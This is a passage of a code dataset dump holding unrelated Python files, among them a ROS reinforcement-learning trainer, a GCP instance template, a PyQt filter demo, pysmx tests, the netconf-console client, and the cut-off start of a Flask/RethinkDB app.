- (Metric(1,2)*Metric(3,4))/2.')\n\n","sub_path":"Example_UFO/L10_1_kin_mass_SM/lorentz.py","file_name":"lorentz.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"411549758","text":"import os\nfrom cr180_model import CR180Model\nfrom cr181_model import CR181Model\nfrom pos040_model import POS040Model\nfrom fw001_model import FW001Model\nfrom fw003_model import FW003Model\n\nfrom form_util import FormUtil, FormModel\nfrom form_filler import FormFiller\nimport shutil\n\n\nclass PacketFactory:\n def __init__(self):\n raise ValueError(\"Don't construct me\")\n\n @staticmethod\n def generate(ph, event, packet_output_folder, resources_directory): # ==> saves PDF\n \"\"\"\n :type ph: PersonalHistory\n :type event: Event\n \"\"\"\n\n if os.path.exists(packet_output_folder):\n shutil.rmtree(packet_output_folder)\n os.makedirs(packet_output_folder)\n\n PacketFactory.generate_form(CR180Model, ph, event, packet_output_folder, resources_directory)\n PacketFactory.generate_form(CR181Model, ph, event, packet_output_folder, resources_directory)\n PacketFactory.generate_form(POS040Model, ph, event, packet_output_folder, resources_directory)\n PacketFactory.generate_form(FW001Model, ph, event, packet_output_folder, resources_directory)\n PacketFactory.generate_form(FW003Model, ph, event, packet_output_folder, resources_directory)\n\n @staticmethod\n def generate_form(form_model, ph, event, packet_output_folder, resources_directory): # ==> saves PDF\n \"\"\"\n :type form_model: FormModel\n \"\"\"\n fields_list = form_model.get_fields(ph, event)\n form_filler = FormFiller(form_model.get_name(), resources_directory)\n json_list = form_filler.get_fields()\n json_list = FormUtil.fill_field_json_with_field_list(json_list, fields_list)\n output_path = os.path.join(packet_output_folder, form_model.get_output_file_name())\n form_filler.fill(json_list, output_path)\n","sub_path":"record_expungement_webapp/packet_factory.py","file_name":"packet_factory.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444734997","text":"#!/usr/bin/env python\n\nfrom shutil import copyfile\nimport sys\nimport errno\nimport os\nfrom datetime import datetime\nimport gym\nimport numpy\nimport time\nfrom gym import wrappers\n\n# ROS packages required\nimport rospy\nimport rospkg\nfrom openai_ros.openai_ros_common import StartOpenAI_ROS_Environment\n\n# DQN\nimport dqn\nimport numpy as np\n\nVS_ROS_DEBUG = 0\nENVS = ['TurtleBot3WorldMapping2RobotsTB3World-v0', 'TurtleBot3WorldMapping2RobotsHouse1-v0', 'TurtleBot3WorldMapping2RobotsHouse2-v0']\nEPISODES = 200\n\nENV_VALUES = ['dev-no-gazebo', 'dev-gazebo', 'deploy']\n\ndef create_dir(path):\n try:\n os.makedirs(os.path.dirname(path))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n\ndef train(environment):\n \"\"\"DQN agent implementation based from https://github.com/keon/deep-q-learning/blob/master/dqn.py\n \"\"\"\n\n if VS_ROS_DEBUG:\n sys.stderr.write(\"Waiting for VS ROS debugger to be attached... 
Press a key and ENTER once it has been attached: \")\n raw_input()\n\n ### Export ENV variables BEGIN\n \n # Add node name to ROS logging messages \n os.environ['ROSCONSOLE_FORMAT']='[${severity}] [${time}]: ${node}: ${message}'\n \n # Set TB3 model\n os.environ['TURTLEBOT3_MODEL'] = 'burger'\n\n # Set ENV variable\n if os.environ.get('ENV') is None:\n os.environ['ENV'] = ENV_VALUES[0]\n\n assert os.environ.get('ENV') in ENV_VALUES, \"The ENV variable is not one of the allowable values: \" + ','.join(ENV_VALUES)\n\n # Set WS path if no env variable is set\n if os.environ.get('ROS_WS') is None:\n os.environ['ROS_WS'] = '/home/jazz/Projects/FEUP/ProDEI/feup-ri/assign3-4/catkin_ws'\n \n ### Export ENV variables END\n\n rospy.init_node('turtlebot3_world_mapping_dqn', anonymous=True, log_level=rospy.WARN)\n\n # Init OpenAI_ROS ENV\n task_and_robot_environment_name = environment\n env = StartOpenAI_ROS_Environment(task_and_robot_environment_name)\n\n # Save starting time\n now = datetime.now()\n current_time = now.strftime(\"%Y-%m-%d-%H-%M-%S\")\n \n # MAKE SURE TO USE loginfo INSTEAD OF logdebug! \n # logdebug doesn't appear in \\rosout for some reason (check rospy API), therefore it won't appear in rosconsole.\n # Create the Gym environment\n rospy.loginfo(\"Gym environment done\")\n rospy.loginfo(\"Starting Learning\")\n\n # Set the logging system\n rospack = rospkg.RosPack()\n pkg_path = rospack.get_path('coop_mapping')\n\n results_dir = os.environ['ROS_WS']+ os.path.sep + 'trainings' + os.path.sep + 'results' + os.path.sep + \"{}-dqn\".format(current_time)\n create_dir(results_dir)\n\n training_weights_file = os.environ['ROS_WS'] + os.path.sep + 'trainings' + os.path.sep + 'weights' + os.path.sep + \"{}-dqn_{}_weights.h5f\".format(current_time, environment)\n create_dir(training_weights_file)\n\n env = wrappers.Monitor(env, results_dir, force=True)\n rospy.loginfo(\"Monitor Wrapper started\")\n\n # Next, we build a very simple model.\n state_size = env.observation_space.shape[0]\n action_size = env.action_space.n\n agent = dqn.DQNAgent(state_size, action_size)\n # agent.load(\"./save/cartpole-dqn.h5\")\n done = False\n batch_size = 32\n\n for e in range(EPISODES):\n state = env.reset()\n state = np.reshape(state, [1, state_size])\n rospy.logwarn(\"Initial state ==> {}\".format(state))\n while True:\n # env.render()\n action = agent.act(state)\n next_state, reward, done, _ = env.step(action)\n rospy.logwarn(\"Action taken ==> {}\".format(action))\n\n next_state = np.reshape(next_state, [1, state_size])\n agent.memorize(state, action, reward, next_state, done)\n state = next_state\n rospy.logwarn(\"After taking action (s, r, d) ==> {}; {}; {}\".format(state, reward, done))\n\n if done:\n break\n\n if len(agent.memory) > batch_size:\n agent.replay(batch_size)\n\n if e % 10 == 0: # save weights every 10 episodes\n agent.save(training_weights_file)\n \n # Copy final map file to have a way of getting robot performance without being writing to file\n copyfile(\"/tmp/ros_merge_map.pgm\", results_dir + os.path.sep + \"final-map-episode-{}.pgm\".format(e))\n\n env.close()\n \nif __name__ == '__main__':\n train(ENVS[0])\n # train(ENVS[1])","sub_path":"assign3-4/catkin_ws/src/internal-packages/coop_mapping/scripts/start_training_2_robots_dqn.py","file_name":"start_training_2_robots_dqn.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"506367045","text":"from helpers import concat_names, 
global_compute_url, zonal_compute_url\n\nclass Instance:\n\n def __init__(self, context, vpc, instance_name, meta_key, meta_value):\n self.vpc = vpc\n self.context = context\n self.meta_key = meta_key\n self.meta_value = meta_value\n self.instance_name = concat_names(\n [context.env['deployment'], context.env['name'], instance_name])\n\n def create_instance(self):\n\n instance = {\n \"zone\": self.context.properties[\"zone\"],\n \"machineType\": zonal_compute_url(self.context.env[\"project\"],\n self.context.properties[\"zone\"],\n \"machineTypes\",\n self.context.properties['instanceType']),\n \"metadata\": {\n \"items\": [{\n \"key\": self.meta_key,\n \"value\": self.context.imports[\n self.context.properties[self.meta_value]],\n }]\n },\n \"disks\": [{\n \"deviceName\": \"boot\",\n \"type\": \"PERSISTENT\",\n \"autoDelete\": True,\n \"boot\": True,\n \"initializeParams\": {\n \"diskName\": self.instance_name + \"-disk\",\n \"diskSizeGb\": self.context.properties['diskSize'],\n \"sourceImage\": global_compute_url(self.context.properties[\"instanceProject\"],\n \"images\",\n self.context.properties[\"instanceImage\"])\n },\n }],\n \"networkInterfaces\": [{\n \"accessConfigs\": [{\n \"name\": \"external-nat\",\n \"type\": \"ONE_TO_ONE_NAT\"\n }],\n \"network\": self.vpc\n }],\n \"serviceAccounts\": [{\n \"email\": \"default\",\n \"scopes\": [\n \"https://www.googleapis.com/auth/logging.write\",\n \"https://www.googleapis.com/auth/monitoring.write\",\n \"https://www.googleapis.com/auth/devstorage.full_control\"\n ]\n }]\n }\n\n resource = {\n \"name\": self.instance_name,\n \"type\": \"compute.v1.instance\",\n \"properties\": instance\n }\n\n return resource\n","sub_path":"instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"3956887","text":"from PyQt5 import QtWidgets, QtCore, QtGui\nfrom PyQt5.QtWidgets import QTabWidget, QDockWidget, QTableView, QHeaderView, QTableWidget, QMessageBox, QAbstractItemView\nfrom PyQt5.QtGui import QStandardItemModel, QStandardItem, QBrush\nfrom PyQt5.QtCore import Qt\n\nclass myWindow(QtWidgets.QMainWindow):\n def __init__(self, parent=None):\n super(myWindow, self).__init__(parent)\n self.centralwidget = QtWidgets.QWidget(self)\n self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.view = QtWidgets.QTableView(self.centralwidget)\n self.label = QtWidgets.QLabel(self)\n\n self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)\n self.gridLayout.addWidget(self.lineEdit, 0, 1, 1, 1)\n self.gridLayout.addWidget(self.view, 1, 0, 1, 3)\n self.gridLayout.addWidget(self.label, 0, 0, 1, 1)\n\n self.setCentralWidget(self.centralwidget)\n\n self.model = QStandardItemModel(self)\n\n for rowName in range(3 * 5):\n self.model.invisibleRootItem().appendRow(\n [ QtGui.QStandardItem(\"row {0} col 1\".format(rowName)) \n for column in range(3)\n ]\n )\n\n self.proxy = QtCore.QSortFilterProxyModel(self)\n self.proxy.setSourceModel(self.model)\n\n self.view.setModel(self.proxy)\n\n # self.comboBox.currentIndexChanged.connect(self.on_comboBox_currentIndexChanged)\n\n self.horizontalHeader = self.view.horizontalHeader()\n self.horizontalHeader.sectionClicked.connect(self.on_view_horizontalHeader_sectionClicked)\n\n @QtCore.pyqtSlot(int)\n def on_view_horizontalHeader_sectionClicked(self, logicalIndex):\n self.logicalIndex = logicalIndex\n self.on_comboBox_currentIndexChanged(self.logicalIndex)\n menuName = '_' + str(logicalIndex) + 
'Menu'\n        if not hasattr(self, menuName):\n            setattr(self, menuName, QtWidgets.QMenu(self))\n            self.menuValues = getattr(self, menuName)\n            menuEdit = QtWidgets.QLineEdit()\n            inputAction = QtWidgets.QWidgetAction(self.menuValues)\n            inputAction.setDefaultWidget(menuEdit)\n            self.menuValues.addAction(inputAction)\n            menuEdit.textChanged.connect(self.on_lineEdit_textChanged)\n\n        self.menuValues = getattr(self, menuName)\n        self.removeActions(self.menuValues)\n\n        self.signalMapper = QtCore.QSignalMapper(self)\n        self.menuValues.mouseReleaseEvent = self._menu_mouseReleaseEvent\n\n        actionAll = QtWidgets.QAction(\"All\", self)\n        actionAll.triggered.connect(self.on_actionAll_triggered)\n        actionAll.setProperty('canHide', True)\n        actionAll.setCheckable(True)\n        self.menuValues.addAction(actionAll)\n        self.menuValues.addSeparator()\n\n        valuesUnique = [self.proxy.data(self.proxy.index(row, self.logicalIndex))\n                        for row in range(self.proxy.rowCount())\n                        ]\n        for actionNumber, actionName in enumerate(sorted(list(set(valuesUnique)))):\n            action = QtWidgets.QAction(actionName, self)\n            self.signalMapper.setMapping(action, actionNumber)\n            action.triggered.connect(self.signalMapper.map)\n            action.setCheckable(True)\n            self.menuValues.addAction(action)\n\n        self.signalMapper.mapped.connect(self.on_signalMapper_mapped)\n\n        headerPos = self.view.mapToGlobal(self.horizontalHeader.pos())\n\n        posY = headerPos.y() + self.horizontalHeader.height()\n        posX = headerPos.x() + self.horizontalHeader.sectionPosition(self.logicalIndex)\n        getattr(self, menuName).exec_(QtCore.QPoint(posX, posY))\n\n    @QtCore.pyqtSlot()\n    def on_actionAll_triggered(self):\n        # Show all rows (clear the column filter)\n        filterColumn = self.logicalIndex\n        filterString = QtCore.QRegExp(\"\",\n                                      QtCore.Qt.CaseInsensitive,\n                                      QtCore.QRegExp.RegExp\n                                      )\n\n        self.proxy.setFilterRegExp(filterString)\n        self.proxy.setFilterKeyColumn(filterColumn)\n\n    @QtCore.pyqtSlot(int)\n    def on_signalMapper_mapped(self, i):\n        # stringAction = self.signalMapper.mapping(i).text()\n        stringActions = '|'.join([x.text() for x in getattr(self, '_' + str(self.logicalIndex) + 'Menu').actions() if x.isChecked()])\n        filterColumn = self.logicalIndex\n        print(stringActions)\n        filterString = QtCore.QRegExp(stringActions,\n                                      QtCore.Qt.CaseSensitive,\n                                      # QtCore.QRegExp.FixedString\n                                      )\n        self.proxy.setFilterRegExp(filterString)\n        self.proxy.setFilterKeyColumn(filterColumn)\n\n    @QtCore.pyqtSlot(str)\n    def on_lineEdit_textChanged(self, text):\n        # Called whenever the text in the search box changes\n        search = QtCore.QRegExp(text,\n                                QtCore.Qt.CaseInsensitive,\n                                QtCore.QRegExp.RegExp\n                                )\n\n        self.proxy.setFilterRegExp(search)\n\n    @QtCore.pyqtSlot(int)\n    def on_comboBox_currentIndexChanged(self, index):\n        self.proxy.setFilterKeyColumn(index)\n\n    def _menu_mouseReleaseEvent(self, event):\n        action = self.menuValues.actionAt(event.pos())\n        if not action:\n            # No action under the cursor, so let QMenu handle the event itself\n            return QtWidgets.QMenu.mouseReleaseEvent(self.menuValues, event)\n        if action.property('canHide'):  # Actions with this property are handled by the menu itself\n            return QtWidgets.QMenu.mouseReleaseEvent(self.menuValues, event)\n        # A QAction was found: trigger it without closing the menu\n        action.activate(action.Trigger)\n\n    def removeActions(self, menu):\n        # Remove every action except the input box (the QWidgetAction)\n        for action in menu.actions():\n            if type(action) != QtWidgets.QWidgetAction:\n                menu.removeAction(action)\n\n    # def _checkAction(self):\n    #     # All three actions are handled by this function\n    #     self.labelInfo.setText('\\n'.join(['{}\\tchecked:{}'.format(\n    #         action.text(), action.isChecked()) for action in self.menuValues.actions()]))\n\nif __name__ == \"__main__\":\n    import sys\n    app = QtWidgets.QApplication(sys.argv)\n    main = myWindow()\n    main.show()\n    main.resize(400, 600)\n    sys.exit(app.exec_())","sub_path":"FtTest.py","file_name":"FtTest.py","file_ext":"py","file_size_in_byte":6457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"360654140","text":"class Solution(object):\n    def minCut(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        if not any(s):\n            return 0\n        A = [-1 for _ in range(len(s)+1)]\n        A[0] = -1\n        min_cut = []\n        for i in range(len(s)):\n            min_cut = []\n            for j in range(i):\n                if s[j:i+1] == s[j:i+1][::-1]:\n                    min_cut.append(A[j]+1)\n            if len(min_cut) > 0:\n                A[i+1] = min(min(min_cut), A[i] + 1)\n            if A[i+1] == -1:\n                A[i+1] = A[i] + 1\n\n        return A[-1]\n\n\nS = Solution()\nprint(S.minCut('aabbaaaa'))","sub_path":"132 - Palindrome Partitioning II.py","file_name":"132 - Palindrome Partitioning II.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"58312660","text":"import pytest\n\nimport smx.compiler\n\n\n@pytest.fixture(scope='session')\ndef compile():\n    def compile(code, **options):\n        # TODO: auto-insert #include and default Plugin:myinfo\n        plugin = smx.compiler.compile(code)\n        plugin.runtime.amx.print_verification = False\n        return plugin\n    return compile\n\n\n@pytest.mark.parametrize('value', [True, False])\ndef test_bool_literal_return(value, compile):\n    plugin = compile('''\n    public bool:Test() {\n        return %s;\n    }\n    ''' % ('true' if value else 'false'))\n    rval = plugin.runtime.call_function_by_name('Test')\n    assert rval is value\n\n\n@pytest.mark.parametrize('integer', [\n    0,\n    1,\n    2147483647,\n    -2147483648,\n])\ndef test_integer_literal_return(integer, compile):\n    plugin = compile('''\n    public Test() {\n        return %d;\n    }\n    ''' % integer)\n    assert plugin.runtime.call_function_by_name('Test') == integer\n\n\ndef test_float_literal_return(compile):\n    plugin = compile('''\n    public Float:Test() {\n        return 12.0;\n    }\n    ''')\n    rval = plugin.runtime.call_function_by_name('Test')\n    assert rval == 12.0\n    assert isinstance(rval, float)\n\n\ndef test_string_return(compile):\n    plugin = compile('''\n    String:Test() {\n        new String:s[] = \"hiss\";\n        return s;\n    }\n    public DontOptimizeOutTest() {\n        Test();\n    }\n    ''')\n    rval = plugin.runtime.call_function_by_name('Test')\n    assert rval == 'hiss'\n\n\n# @pytest.mark.xfail(reason='rvals from inner calls currently unsupported')\ndef test_interpreter(compile):\n    plugin = compile(\"\"\"\n    #include <sourcemod>\n\n    public Plugin:myinfo = {\n        name = \"PySMX Test\",\n        author = \"theY4Kman\",\n        description = \"Test plug-in for the PySMX VM\",\n        version = \"0.0\",\n        url = \"https://github.com/theY4Kman/pysmx/\"\n    };\n\n    public OnPluginStart()\n    {\n        new percent = 100;\n        for (new i=0; i<10; i++)\n            percent += i;\n\n        PrintToServer(\"%s function%c work %d%% (+/- %.3f) of the time! 
No longer 0x%x -- now we're 0x%X!\", \"Format\", 's', percent, 5.3, 0xdeadbeef, 0xcafed00d);\n Test();\n\n CreateTimer(1.0, Timer_Callback, 5);\n }\n\n Test()\n {\n PrintToServer(\"Called Test()\");\n }\n\n public Action:Timer_Callback(Handle:timer, any:data)\n {\n PrintToServer(\"Timer fired with: %d\", data);\n }\n\n new i_GlobalValue = 1337;\n public ReturnGlobal() {\n return i_GlobalValue;\n }\n\n public ReturnTwentyThree() {\n return ReturnTwentyThreeInner();\n }\n\n ReturnTwentyThreeInner() {\n return 23;\n }\n \"\"\")\n\n # This works\n assert plugin.runtime.call_function_by_name('ReturnTwentyThreeInner') == 23\n\n # But this doesn't\n # assert plugin.runtime.call_function_by_name('ReturnTwentyThree') == 23\n\n\ndef test_convars(compile):\n plugin = compile('''\n new Handle:g_cvar = INVALID_HANDLE;\n public TestCreateConVar() {\n g_cvar = CreateConVar(\"pysmx_num\", \"350\", \"description\");\n }\n public TestGetConVarInt() {\n return GetConVarInt(g_cvar);\n }\n ''')\n\n plugin.runtime.call_function_by_name('TestCreateConVar')\n value = plugin.runtime.call_function_by_name('TestGetConVarInt')\n assert value == 350\n","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"480746129","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport argparse\nimport readline\nimport getpass\nfrom ncclient import manager, transport\nfrom lxml import etree\nfrom ncclient.operations.rpc import RPCError\nfrom contextlib import contextmanager\nimport six\nimport traceback\nimport re\n\nfrom . import nctransport, completions, operations\n\n\nclass OperationArgAction(argparse.Action):\n def __init__(self, *args, **kwargs):\n self.operation = kwargs[\"const\"]\n super(OperationArgAction, self).__init__(*args, **kwargs)\n\n def __call__(self, parser, ns, values, option_string=None):\n if self.operation.nargs == \"?\":\n values = [] if values == self.operation else [values]\n ns.operations.append((self.operation, values))\n\n\nquoted_rgx = r'\"[^\\\\\"]*(?:\\\\.[^\\\\\"]*)*\"|[^ ]+'\n\n\ndef parse_expr_args(expression):\n expr = \" \" + expression\n spaces = re.compile(\" +\")\n quoted = re.compile(quoted_rgx)\n while expr != \"\":\n spm = spaces.match(expr)\n if spm is None:\n raise ParserException(\"Syntax error before \" + expr.split()[0])\n expm = quoted.match(expr[spm.end():])\n if expm is None:\n raise ParserException(\"Syntax error before \" + expr[spm.end():].split()[0])\n ex = expm.group()\n if ex[0] == '\"':\n yield re.sub(r\"\\\\(.)\", r\"\\1\", ex[1:-1])\n else:\n yield ex\n expr = expr[spm.end() + expm.end():]\n\n\nclass ExpressionOperation(operations.Operation):\n def __init__(self, exprparser, process_errors=True):\n self.exprparser = exprparser\n self.process_errors = process_errors\n\n def invoke(self, mc, ns, expression):\n expression = expression.strip()\n if expression == '':\n return None\n try:\n ns = self.exprparser.parse_args(parse_expr_args(expression),\n namespace=argparse.Namespace(**vars(ns)))\n except ParserException as e:\n print(e, file=sys.stderr)\n return None\n if hasattr(ns, 'cmd_parser') and ns.cmd_parser is not None:\n ns.cmd_parser.print_help()\n return None\n try:\n if hasattr(ns, \"value\"):\n return ns.op.invoke(mc, ns, ns.value)\n else:\n return ns.op.invoke(mc, ns)\n except RPCError as e:\n if self.process_errors:\n return e.xml\n raise\n except Exception as e:\n if self.process_errors:\n 
report_exception(e, ns.debug)\n return None\n raise\n\n\ndef report_exception(exc, debug=False):\n if debug:\n traceback.print_exc(file=sys.stderr)\n else:\n msg = str(exc)\n if len(msg) > 100:\n msg = msg[:80] + \"...\"\n print('Operation failed: %s - %s' % (exc.__class__.__name__, msg))\n\n\nclass ParserException(Exception):\n pass\n\n\nclass SafeParser(argparse.ArgumentParser):\n def error(self, message):\n raise ParserException(message)\n\n\ndef expression_parser(parsercls=argparse.ArgumentParser, custom_help=False, **kwargs):\n exprparser = parsercls(prog='', **kwargs)\n exprs = exprparser.add_subparsers(help=\"Netconf commands\")\n for opcls in operations.OPERATIONS:\n op = opcls()\n parserargs = dict(parents=[command_options_parser(op)], help=op.help)\n if custom_help:\n parserargs['add_help'] = False\n cmdparser = exprs.add_parser(op.option, **parserargs)\n if custom_help:\n cmdparser.add_argument(\"-h\", \"--help\", action=\"store_const\", const=cmdparser,\n dest=\"cmd_parser\", help=\"show this help message\")\n if op.nargs == 1:\n cmdparser.add_argument(\"value\")\n elif op.nargs == \"?\":\n cmdparser.add_argument(\"value\", nargs=op.nargs)\n cmdparser.set_defaults(op=op)\n return exprparser\n\n\ncommand_option_args = {\n \"style\": ([\"-s\", \"--outputStyle\"],\n dict(dest=\"style\", default=[],\n choices=[\"plain\", \"noaaa\"], nargs=\"*\")),\n \"db\": ([\"--db\"],\n dict(dest=\"db\", default=\"running\",\n help=\"Database for commands that operate on a database.\")),\n \"timeout\": ([\"--timeout\"],\n dict(dest=\"timeout\", default=600, type=int,\n help=\"Confirmed commit timeout (in seconds).\")),\n \"wdefaults\": ([\"--with-defaults\"],\n dict(dest=\"wdefaults\", default=None,\n choices=[\"explicit\", \"trim\", \"report-all\", \"report-all-tagged\"],\n help=\"Use with --get, --get-config, or --copy-config.\")),\n \"winactive\": ([\"--with-inactive\"],\n dict(dest=\"winactive\", action=\"store_true\",\n help=\"Send with-inactive parameter. 
Use with --get, \"\n \"--get-config, --copy-config, or --edit-config.\")), # FIXME: not supported\n \"xpath\": ([\"-x\", \"--xpath\"],\n dict(dest=\"xpath\",\n help=\"XPath filter to be used with --get, --get-config, \"\n \"and --create-subscription; kept for backward compatibility, \"\n \"the operations accept direct arguments if provided.\")),\n \"test\": (\n [\"-t\", \"--test-option\"],\n dict(dest=\"test\",\n choices=[\"test-then-set\", \"set\", \"test-only\"],\n help=\"Value of test-option used with edit-config (defaults to test-then-set)\")),\n \"operation\": (\n [\"-o\", \"--operation\"],\n dict(dest=\"operation\", default=\"merge\",\n choices=[\"merge\", \"replace\", \"create\"],\n help=\"Value of the operation attribute used with --set.\")),\n \"deloperation\": (\n [\"--del-operation\"],\n dict(dest=\"deloperation\", default=\"remove\",\n choices=[\"remove\", \"delete\"],\n help=\"Value of the operation attribute used with --delete.\"))\n}\n\n\ndef command_options_parser(operation=None):\n cmd_opt_parser = argparse.ArgumentParser(add_help=False)\n cmd_group = cmd_opt_parser.add_argument_group(\"Command options\")\n options = command_option_args.keys() if operation is None else operation.command_opts\n for opt in options:\n args, kws = command_option_args[opt]\n cmd_group.add_argument(*args, **kws)\n return cmd_opt_parser\n\n\ndef argparser():\n parser = argparse.ArgumentParser(prog=\"netconf-console\", parents=[command_options_parser()])\n parser.add_argument(\"-v\", \"--version\", dest=\"version\",\n help=\"force NETCONF version 1.0 or 1.1\") # FIXME: not supported\n parser.add_argument(\"-u\", \"--user\", dest=\"username\", default=\"admin\",\n help=\"username\")\n parser.add_argument(\"-p\", \"--password\", dest=\"password\", default=\"admin\", const=None, nargs=\"?\",\n help=\"password\")\n parser.add_argument(\"--host\", dest=\"host\", default=\"127.0.0.1\",\n help=\"NETCONF agent hostname\")\n parser.add_argument(\"--port\", dest=\"port\", default=2022, type=int,\n help=\"NETCONF agent SSH port\")\n parser.add_argument(\"--privKeyFile\", help=\"File which contains the private key.\")\n parser.add_argument(\"--raw\", type=argparse.FileType(\"w\"), nargs=\"?\", const=sys.stdout)\n parser.add_argument(\"--tcp\", action=\"store_true\"),\n parser.add_argument(\"-N\", \"--ns\", dest=\"ns\",\n help=\"Namespace prefix; useful for get queries with xpath filter.\",\n nargs=\"*\")\n\n parser.add_argument(\"--debug\", action=\"store_true\")\n\n cmds = parser.add_argument_group(\"Commands\")\n parser.set_defaults(operations=[])\n for opcls in operations.OPERATIONS:\n op = opcls()\n cmds.add_argument(\"--%s\" % op.option,\n dest=op.dest,\n nargs=op.nargs,\n action=OperationArgAction,\n const=op,\n choices=op.choices,\n help=op.help)\n\n exprparser = expression_parser()\n parser.add_argument(\"-e\", \"--expr\",\n action=OperationArgAction,\n nargs=1,\n const=ExpressionOperation(exprparser))\n parser.add_argument(\"--dry\", action=\"store_true\", default=False,\n help=\"Do not send anything, return the RPC to be sent (debugging only).\")\n parser.add_argument(\"--interactive\", \"-i\", action=\"store_true\",\n help=\"Run the console interactively (do not use with commands).\")\n parser.add_argument(\"filename\",\n nargs=\"?\",\n help=\"Filename (or '-') containing v1.0-delimited list of NETCONF RPCs. \"\n \"Retained for backward compatibility, it is suggested to use \"\n \"a sequence of --get, --set, etc. commands instead. 
\"\n \"Cannot be combined with other commands.\")\n return parser\n\n\nclass SSHSession(transport.SSHSession):\n def __init__(self, device_handler, raw_file):\n self.raw_file = raw_file\n super(SSHSession, self).__init__(device_handler)\n self.last_pos = 0\n\n def _parse10(self):\n with self.raw_processing(self._parsing_pos10):\n super(SSHSession, self)._parse10()\n\n def _parse11(self):\n with self.raw_processing(self._parsing_pos11):\n super(SSHSession, self)._parse11()\n\n @contextmanager\n def raw_processing(self, position):\n if self.raw_file is not None:\n self.raw_file.write(self._buffer.getvalue()[self.last_pos:].decode(\"utf8\"))\n try:\n yield\n finally:\n self.last_pos = self._buffer.tell()\n\n\ndef connect(ns):\n password = ns.password\n if password is None:\n password = getpass.getpass()\n connect_args = dict(host=ns.host, port=ns.port,\n username=ns.username, password=password,\n key_filename=ns.privKeyFile,\n hostkey_verify=False, look_for_keys=False, allow_agent=False)\n device_handler = manager.make_device_handler(None)\n if not ns.tcp and not ns.raw:\n # use the public API only\n session = transport.SSHSession(device_handler)\n elif ns.tcp:\n session = nctransport.TCPSession(device_handler, ns.raw)\n else:\n session = nctransport.SSHSession(device_handler, ns.raw)\n if not ns.tcp and (\"hostkey_verify\" not in connect_args or connect_args[\"hostkey_verify\"]):\n session.load_known_hosts()\n try:\n session.connect(**connect_args)\n except Exception:\n if session.transport:\n session.close()\n raise\n return manager.Manager(session, device_handler, **connect_args)\n\n\ndef interactive_data():\n readline.parse_and_bind(\"tab: complete\")\n readline.set_completer_delims(\" \")\n readline.set_completer(completions.NCCompleter(operations.OPERATION_OPTS,\n command_option_args))\n try:\n while True:\n command = six.moves.input('netconf> ')\n yield command\n except EOFError:\n return\n\n\ndef interactive_operations(exprparser, mc):\n if sys.stdin.isatty():\n data = interactive_data()\n else:\n data = sys.stdin\n operation = ExpressionOperation(exprparser)\n for command in data:\n if not mc.connected:\n return\n yield (operation, [command])\n return\n\n\ndef connect_and_process(ns):\n with connect(ns) as mc:\n try:\n if ns.filename:\n operations_iter = operations.FilenameOperations(ns.filename).operations()\n elif ns.interactive:\n expr_parser = expression_parser(SafeParser, custom_help=True)\n expr_parser.set_defaults(debug=ns.debug)\n operations_iter = interactive_operations(expr_parser, mc)\n else:\n operations_iter = ns.operations\n for (operation, args) in operations_iter:\n reply = operation.invoke(mc, ns, *args)\n if reply is not None:\n print(etree.tostring(reply, encoding=six.text_type,\n pretty_print=(\"plain\" not in ns.style)))\n except RPCError as e:\n print(etree.tostring(e.xml, encoding=six.text_type, pretty_print=True))\n return -1\n return 0\n\n\ndef main():\n parser = argparser()\n ns = parser.parse_args(sys.argv[1:])\n if ns.operations == [] and ns.filename is None:\n ns.interactive = True\n if ns.interactive and ns.operations != [] or \\\n ns.interactive and ns.filename is not None or \\\n ns.operations != [] and ns.filename is not None:\n parser.print_help()\n return 1\n if ns.dry:\n operations.run_rpc_dry()\n try:\n return connect_and_process(ns)\n except Exception as e:\n report_exception(e, ns.debug)\n return -1\n\n\nif __name__ == \"__main__\":\n 
sys.exit(main())\n","sub_path":"netconf-console-1.1.1/ncc/ncc.py","file_name":"ncc.py","file_ext":"py","file_size_in_byte":13031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"193836657","text":"from flask import Flask\nfrom flask import request, g, abort\nimport rethinkdb as r\nfrom rethinkdb.errors import RqlRuntimeError, RqlDriverError\n\nimport json\nfrom configs import RDB_HOST, RDB_PORT, TODO_DB, codes\n\napplication = Flask(__name__)\n\n\ndef add_to_log(*args):\n    print('\\n'.join([str(arg) for arg in args]))\n\n\n# db setup; only run once\ndef dbSetup():\n    connection = r.connect(host=RDB_HOST, port=RDB_PORT)\n    try:\n        r.db_create(TODO_DB).run(connection)\n        r.db(TODO_DB).table_create('users').run(connection)\n        r.db(TODO_DB).table_create('interests').run(connection)\n        print('Database setup completed')\n    except RqlRuntimeError:\n        print('Database already exists.')\n    finally:\n        connection.close()\ndbSetup()\n\n# open connection before each request\n@application.before_request\ndef before_request():\n    try:\n        g.rdb_conn = r.connect(host=RDB_HOST, port=RDB_PORT, db=TODO_DB)\n    except RqlDriverError:\n        abort(503, \"Database connection could not be established.\")\n\n\n# close the connection after each request\n@application.teardown_request\ndef teardown_request(exception):\n    try:\n        g.rdb_conn.close()\n    except AttributeError:\n        pass\n\n\n@application.route('/registration', methods=['POST'])\ndef create_user():\n    data = request.get_json()\n\n    if user_exists(data['email']):\n        return 'User already exists'\n    else:\n        try:\n            r.table('users').insert(data).run(g.rdb_conn)\n        except Exception as e:\n            